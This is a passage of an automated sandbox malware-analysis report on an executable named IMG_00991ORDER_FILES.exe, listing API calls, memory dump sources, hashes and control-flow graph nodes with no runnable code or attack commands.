                                                                                    • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                                                                    • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                                                    • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,80000000,00000003), ref: 00405E75
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,80000000,00000003), ref: 00405E85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-3370423016
                                                                                    • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                    • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                                                                    • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                    • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405FD1
                                                                                    • CharNextA.USER32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE2
                                                                                    • lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                    • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                    • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9

                                                                                    Execution Graph

                                                                                    Execution Coverage:0%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:20.9%
                                                                                    Total number of Nodes:115
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 50413 35208520 GetPEB GetPEB GetPEB GetPEB RtlDebugPrintTimes 50414 35208322 467 API calls 50495 351edc1a 286 API calls 50415 35201527 284 API calls 50416 3529892e 32 API calls 50497 351c821b 294 API calls 50498 351d3e14 467 API calls 50417 351c7917 GetPEB 50418 351cbd10 GetPEB GetPEB LdrInitializeThunk 50499 351c9610 468 API calls 50501 351d2410 321 API calls 50419 3529b927 9 API calls 50504 35206e30 RtlDebugPrintTimes GetPEB GetPEB 50505 351c640d 471 API calls 50506 351d8009 278 API calls 50507 351cec0b 313 API calls 50509 351c6e00 RtlDebugPrintTimes RtlDebugPrintTimes 50510 351d6e00 17 API calls 50511 351fd600 487 API calls 50423 35205900 283 API calls 50424 3525330c 281 API calls 50513 351cb830 464 API calls 50514 35263608 470 API calls 50516 351d2e32 304 API calls 50518 3520dc14 289 API calls 50430 351cbf20 288 API calls 50520 351cb420 8 API calls 50521 351cb620 GetPEB RtlDebugPrintTimes GetPEB 50522 351d2022 15 API calls 50433 35207960 281 API calls 50523 35208e60 GetPEB LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 50524 3528be6b 278 API calls 50525 35279060 126 API calls 50434 35291163 GetPEB GetPEB RtlDebugPrintTimes LdrInitializeThunk LdrInitializeThunk 50437 351db950 466 API calls 50527 351ec850 467 API calls 50531 3526327e 293 API calls 50441 351ee547 298 API calls 50442 351ca740 336 API calls 50443 351cc140 287 API calls 50532 351d3640 293 API calls 50446 3524f947 472 API calls 50533 351d8c79 6 API calls 50534 351d6074 289 API calls 50450 351d5570 326 API calls 50451 351d1f70 300 API calls 50452 351faf72 308 API calls 50453 351d6970 491 API calls 50454 351fa370 280 API calls 50455 35208d4f 303 API calls 50456 35207550 286 API calls 50537 3527ee54 117 API calls 50538 351c7060 RtlDebugPrintTimes 50539 351cb260 295 API calls 50541 351d4660 10 API calls 50542 3527865a GetPEB RtlDebugPrintTimes GetPEB LdrInitializeThunk 50543 351d3c60 11 API calls 50458 351ef960 473 API calls 50459 3520415f 281 API calls 50460 352043a0 295 API calls 50461 351c8196 GetPEB GetPEB 50462 351d6d91 GetPEB GetPEB GetPEB 50545 351cc090 304 API calls 50546 351ca290 460 API calls 50547 351cfe90 7 API calls 50549 351d7290 14 API calls 50550 351ed690 GetPEB GetPEB GetPEB RtlDebugPrintTimes RtlDebugPrintTimes 50554 35295ebe RtlDebugPrintTimes LdrInitializeThunk 50555 351c7c85 294 API calls 50557 351fbe80 279 API calls 50469 3526d586 159 API calls 50410 35212a80 LdrInitializeThunk 50558 3527ec84 12 API calls 50559 351c82b0 280 API calls 50471 351ce9ac 305 API calls 50560 3520b490 501 API calls 50472 3527e993 277 API calls 50562 351ce0a4 293 API calls 50473 35253f9f GetPEB GetPEB GetPEB RtlDebugPrintTimes 50563 35252e9f 319 API calls 50475 351c7da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 50564 351cbea0 291 API calls 50565 351d06a0 293 API calls 50566 351d00a0 475 API calls 50476 352069e0 6 API calls 50569 352aaceb RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 50570 351d4cd5 RtlDebugPrintTimes GetPEB GetPEB GetPEB LdrInitializeThunk 50478 351cc1d0 278 API calls 50479 351c9fd0 279 API calls 50572 351ff4d0 291 API calls 50573 3520a4f0 282 API calls 50574 352062f0 322 API calls 50481 352279f0 7 API calls 50576 351d4cca 11 API calls 50482 351c81c0 GetPEB LdrInitializeThunk 50483 351ce3c0 343 API calls 50484 351cbfc0 GetPEB GetPEB GetPEB GetPEB 50577 351cb0c0 355 API calls 50486 351d1dc0 RtlDebugPrintTimes GetPEB GetPEB GetPEB GetPEB 50487 351e51c0 321 API calls 50489 352087c0 279 API calls 50580 35206cc0 285 API calls 50581 35209cc4 299 API calls 50582 352786c2 7 API calls 50491 3520c5c6 466 API calls 50492 351d1ffa LdrInitializeThunk 50493 35251fc9 497 API calls 50583 351fecf3 296 API calls 50584 351d64f0 RtlDebugPrintTimes GetPEB 50585 3529d4c6 30 API calls 50587 351facf0 288 API calls 50591 351c72e0 278 API calls 50592 351d56e0 319 API calls 50593 351f66e0 346 API calls 50594 351d3ee2 9 API calls

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 3 352134e0-352134ec LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 332172746d849de3942229a7a9447177f81dd899eeb2af4970bd289dffcb11c0
                                                                                    • Instruction ID: 1937dbc858177dde67a98a71b85c0d126162d4e42b9c714c2fd59d0275fbc3c6
                                                                                    • Opcode Fuzzy Hash: 332172746d849de3942229a7a9447177f81dd899eeb2af4970bd289dffcb11c0
                                                                                    • Instruction Fuzzy Hash: C990023560520806D54061584614706105647D0201FA2C856E4414568DC7E9C95575A3

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2 35212d10-35212d1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2f03e2480bd0a57072c26aa2dc26f6f168e5e7bd2fee7ed13943d93319c2fd92
                                                                                    • Instruction ID: 19315c7664a1813f096bdcac93f2e8a89d78a0e1f01d025b09c8a19a2567eac9
                                                                                    • Opcode Fuzzy Hash: 2f03e2480bd0a57072c26aa2dc26f6f168e5e7bd2fee7ed13943d93319c2fd92
                                                                                    • Instruction Fuzzy Hash: 1E90023520110817D55161584604707005A47D0241FD2C857E4414558DD6AAC956B122

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1 35212b90-35212b9c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7354d62fc36eea4301bdf08adfa044f1549f2df4edc1351c505ac01d3ebd6b6c
                                                                                    • Instruction ID: ece31c92dd3bdab055404e7df6289bea6dfd5bf2c863da3ef5e0593ce9374703
                                                                                    • Opcode Fuzzy Hash: 7354d62fc36eea4301bdf08adfa044f1549f2df4edc1351c505ac01d3ebd6b6c
                                                                                    • Instruction Fuzzy Hash: 6590023520118C06D5506158850474A005647D0301F96C856E8414658DC6E9C8957122

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 35212a80-35212a8c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 41f8bb5a0cd532d3e84f1de1ab78ebe6a960485109ba1358441612dd4cf8c2e7
                                                                                    • Instruction ID: 00227c92819b6024041fbbd435821b5a1d702602120411b38a27859151d90f43
                                                                                    • Opcode Fuzzy Hash: 41f8bb5a0cd532d3e84f1de1ab78ebe6a960485109ba1358441612dd4cf8c2e7
                                                                                    • Instruction Fuzzy Hash: 8590026520210407454571584514716405B47E0201F92C466E5004590DC579C8957126

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 555 35279060-352790a9 556 352790ab-352790b0 555->556 557 352790f8-35279107 555->557 558 352790b4-352790ba 556->558 557->558 559 35279109-3527910e 557->559 560 35279215-3527923d call 35218f40 558->560 561 352790c0-352790e4 call 35218f40 558->561 562 35279893-352798a7 call 35214b50 559->562 571 3527923f-3527925a call 352798aa 560->571 572 3527925c-35279292 560->572 569 352790e6-352790f3 call 352992ab 561->569 570 35279113-352791b4 GetPEB call 3527d7e5 561->570 581 352791fd-35279210 RtlDebugPrintTimes 569->581 582 352791b6-352791c4 570->582 583 352791d2-352791e7 570->583 576 35279294-35279296 571->576 572->576 576->562 580 3527929c-352792b1 RtlDebugPrintTimes 576->580 580->562 587 352792b7-352792be 580->587 581->562 582->583 586 352791c6-352791cb 582->586 583->581 585 352791e9-352791ee 583->585 588 352791f3-352791f6 585->588 589 352791f0 585->589 586->583 587->562 591 352792c4-352792df 587->591 588->581 589->588 592 352792e3-352792f4 call 3527a388 591->592 595 35279891 592->595 596 352792fa-352792fc 592->596 595->562 596->562 597 35279302-35279309 596->597 598 3527930f-35279314 597->598 599 3527947c-35279482 597->599 602 35279316-3527931c 598->602 603 3527933c 598->603 600 3527961c-35279622 599->600 601 35279488-352794b7 call 35218f40 599->601 605 35279674-35279679 600->605 606 35279624-3527962d 600->606 617 352794f0-35279505 601->617 618 352794b9-352794c4 601->618 602->603 607 3527931e-35279332 602->607 608 35279340-35279391 call 35218f40 RtlDebugPrintTimes 603->608 612 3527967f-35279687 605->612 613 35279728-35279731 605->613 606->592 611 35279633-3527966f call 35218f40 606->611 614 35279334-35279336 607->614 615 35279338-3527933a 607->615 608->562 642 35279397-3527939b 608->642 635 35279869 611->635 621 35279693-352796bd call 35278093 612->621 622 35279689-3527968d 612->622 613->592 619 35279737-3527973a 613->619 614->608 615->608 628 35279507-35279509 617->628 629 35279511-35279518 617->629 623 352794c6-352794cd 618->623 624 352794cf-352794ee 618->624 625 35279740-3527978a 619->625 626 352797fd-35279834 call 35218f40 619->626 648 352796c3-3527971e call 35218f40 RtlDebugPrintTimes 621->648 649 35279888-3527988c 621->649 622->613 622->621 623->624 634 35279559-35279576 RtlDebugPrintTimes 624->634 632 35279791-3527979e 625->632 633 3527978c 625->633 651 35279836 626->651 652 3527983b-35279842 626->652 636 3527950f 628->636 637 3527950b-3527950d 628->637 638 3527953d-3527953f 629->638 645 352797a0-352797a3 632->645 646 352797aa-352797ad 632->646 633->632 634->562 669 3527957c-3527959f call 35218f40 634->669 647 3527986d 635->647 636->629 637->629 643 35279541-35279557 638->643 644 3527951a-35279524 638->644 653 3527939d-352793a5 642->653 654 352793eb-35279400 642->654 643->634 659 35279526 644->659 660 3527952d 644->660 645->646 657 352797af-352797b2 646->657 658 352797b9-352797fb 646->658 656 35279871-35279886 RtlDebugPrintTimes 647->656 648->562 684 35279724 648->684 649->592 651->652 664 35279844-3527984b 652->664 665 3527984d 652->665 666 352793a7-352793d0 call 35278093 653->666 667 352793d2-352793e9 653->667 668 35279406-35279414 654->668 656->562 656->649 657->658 658->656 659->643 661 35279528-3527952b 659->661 663 3527952f-35279531 660->663 661->663 670 35279533-35279535 663->670 671 3527953b 663->671 672 35279851-35279857 664->672 665->672 674 35279418-3527946f call 35218f40 RtlDebugPrintTimes 666->674 667->668 668->674 687 352795a1-352795bb 669->687 688 352795bd-352795d8 669->688 670->671 678 35279537-35279539 670->678 671->638 679 3527985e-35279864 672->679 680 35279859-3527985c 672->680 674->562 691 35279475-35279477 674->691 678->638 679->647 685 35279866 679->685 680->635 684->613 685->635 689 352795dd-3527960b RtlDebugPrintTimes 687->689 688->689 689->562 693 35279611-35279617 689->693 691->649 693->619
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $ $0
                                                                                    • API String ID: 3446177414-3352262554
                                                                                    • Opcode ID: ef3dc5ad8c92625b2c6fd0226c8189334c8a897776f383f63efa11f53c55c2c5
                                                                                    • Instruction ID: 0b90bbc01fafed3d12d0278ae0dfae8ad173f62b293deb5655609c37c704866c
                                                                                    • Opcode Fuzzy Hash: ef3dc5ad8c92625b2c6fd0226c8189334c8a897776f383f63efa11f53c55c2c5
                                                                                    • Instruction Fuzzy Hash: 993213B16083818FE350CF69C884B5BBBF5BF88344F40492EF99987252D7B5E949CB52

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 764 35208540-352085a1 765 352450a2-352450a8 764->765 766 352085a7-352085b8 764->766 765->766 767 352450ae-352450bb GetPEB 765->767 767->766 768 352450c1-352450c4 767->768 769 352450c6-352450d0 768->769 770 352450e1-35245107 call 35212c00 768->770 769->766 772 352450d6-352450df 769->772 770->766 775 3524510d-35245111 770->775 773 35245138-3524514c call 351d53c0 772->773 780 35245152-3524515e 773->780 775->766 777 35245117-3524512c call 35212c00 775->777 777->766 784 35245132 777->784 782 35245164-35245178 780->782 783 35245367-35245373 call 35245378 780->783 786 35245196-3524520c 782->786 787 3524517a 782->787 783->766 784->773 791 35245245-35245248 786->791 792 3524520e-35245240 call 351cfcf0 786->792 790 3524517c-35245183 787->790 790->786 793 35245185-35245187 790->793 797 3524524e-3524529f 791->797 798 3524531f-35245322 791->798 804 35245358-3524535d call 3525a130 792->804 794 3524518e-35245190 793->794 795 35245189-3524518c 793->795 794->786 799 35245360-35245362 794->799 795->790 805 352452a1-352452d7 call 351cfcf0 797->805 806 352452d9-3524531d call 351cfcf0 * 2 797->806 798->799 800 35245324-35245353 call 351cfcf0 798->800 799->780 800->804 804->799 805->804 806->804
                                                                                    Strings
                                                                                    • corrupted critical section, xrefs: 352452CD
                                                                                    • Critical section address., xrefs: 3524530D
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 3524534E
                                                                                    • double initialized or corrupted critical section, xrefs: 35245313
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 352452D9
                                                                                    • Critical section debug info address, xrefs: 3524522A, 35245339
                                                                                    • Invalid debug info address of this critical section, xrefs: 352452C1
                                                                                    • 8, xrefs: 352450EE
                                                                                    • undeleted critical section in freed memory, xrefs: 35245236
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 352452ED
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 35245215, 352452A1, 35245324
                                                                                    • Address of the debug info found in the active list., xrefs: 352452B9, 35245305
                                                                                    • Thread identifier, xrefs: 35245345
                                                                                    • Critical section address, xrefs: 35245230, 352452C7, 3524533F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    • Opcode ID: a91b5cee77f0751f196808944d9ba9686a7662df32f7ec914e981252d4855f42
                                                                                    • Instruction ID: 67f3d45d7f9aa603ca6b7baa756ca0cad937ac083a7c8e3409872972d2c4d7d9
                                                                                    • Opcode Fuzzy Hash: a91b5cee77f0751f196808944d9ba9686a7662df32f7ec914e981252d4855f42
                                                                                    • Instruction Fuzzy Hash: A3817BB5A01359AFEF14CF94C840F9EBBB5BB08710F214199F949B7280DBB5A945CF60

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 816 3527fdf4-3527fe16 call 35227be4 819 3527fe35-3527fe4d call 351c7662 816->819 820 3527fe18-3527fe30 RtlDebugPrintTimes 816->820 825 3527fe53-3527fe69 819->825 826 35280277 819->826 824 352802d1-352802e0 820->824 827 3527fe70-3527fe72 825->827 828 3527fe6b-3527fe6e 825->828 829 3528027a-352802ce call 352802e6 826->829 831 3527fe73-3527fe8a 827->831 828->831 829->824 833 3527fe90-3527fe93 831->833 834 35280231-3528023a GetPEB 831->834 833->834 838 3527fe99-3527fea2 833->838 836 35280259-3528025e call 351cb910 834->836 837 3528023c-35280257 GetPEB call 351cb910 834->837 845 35280263-35280274 call 351cb910 836->845 837->845 841 3527fea4-3527febb call 351dfed0 838->841 842 3527febe-3527fed1 call 35280835 838->842 841->842 850 3527fed3-3527feda 842->850 851 3527fedc-3527fef0 call 351c753f 842->851 845->826 850->851 855 3527fef6-3527ff02 GetPEB 851->855 856 35280122-35280127 851->856 857 3527ff04-3527ff07 855->857 858 3527ff70-3527ff7b 855->858 856->829 859 3528012d-35280139 GetPEB 856->859 862 3527ff26-3527ff2b call 351cb910 857->862 863 3527ff09-3527ff24 GetPEB call 351cb910 857->863 860 35280068-3528007a call 351e2710 858->860 861 3527ff81-3527ff88 858->861 864 3528013b-3528013e 859->864 865 352801a7-352801b2 859->865 883 35280110-3528011d call 35280d24 call 35280835 860->883 884 35280080-35280087 860->884 861->860 867 3527ff8e-3527ff97 861->867 880 3527ff30-3527ff51 call 351cb910 GetPEB 862->880 863->880 870 3528015d-35280162 call 351cb910 864->870 871 35280140-3528015b GetPEB call 351cb910 864->871 865->829 868 352801b8-352801c3 865->868 875 3527ff99-3527ffa9 867->875 876 3527ffb8-3527ffbc 867->876 868->829 877 352801c9-352801d4 868->877 882 35280167-3528017b call 351cb910 870->882 871->882 875->876 885 3527ffab-3527ffb5 call 3528d646 875->885 887 3527ffce-3527ffd4 876->887 888 3527ffbe-3527ffcc call 35203ae9 876->888 877->829 886 352801da-352801e3 GetPEB 877->886 880->860 902 3527ff57-3527ff6b 880->902 914 3528017e-35280188 GetPEB 882->914 883->856 892 35280089-35280090 884->892 893 35280092-3528009a 884->893 885->876 896 35280202-35280207 call 351cb910 886->896 897 352801e5-35280200 GetPEB call 351cb910 886->897 899 3527ffd7-3527ffe0 887->899 888->899 892->893 904 352800b8-352800bc 893->904 905 3528009c-352800ac 893->905 911 3528020c-3528022c call 3527823a call 351cb910 896->911 897->911 900 3527fff2-3527fff5 899->900 901 3527ffe2-3527fff0 899->901 912 3527fff7-3527fffe 900->912 913 35280065 900->913 901->900 902->860 917 352800ec-352800f2 904->917 918 352800be-352800d1 call 35203ae9 904->918 905->904 915 352800ae-352800b3 call 3528d646 905->915 911->914 912->913 921 35280000-3528000b 912->921 913->860 914->829 923 3528018e-352801a2 914->923 915->904 922 352800f5-352800fc 917->922 933 352800e3 918->933 934 352800d3-352800e1 call 351ffdb9 918->934 921->913 927 3528000d-35280016 GetPEB 921->927 922->883 928 352800fe-3528010e 922->928 923->829 931 35280018-35280033 GetPEB call 351cb910 927->931 932 35280035-3528003a call 351cb910 927->932 928->883 942 3528003f-3528005d call 3527823a call 351cb910 931->942 932->942 935 352800e6-352800ea 933->935 934->935 935->922 942->913
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
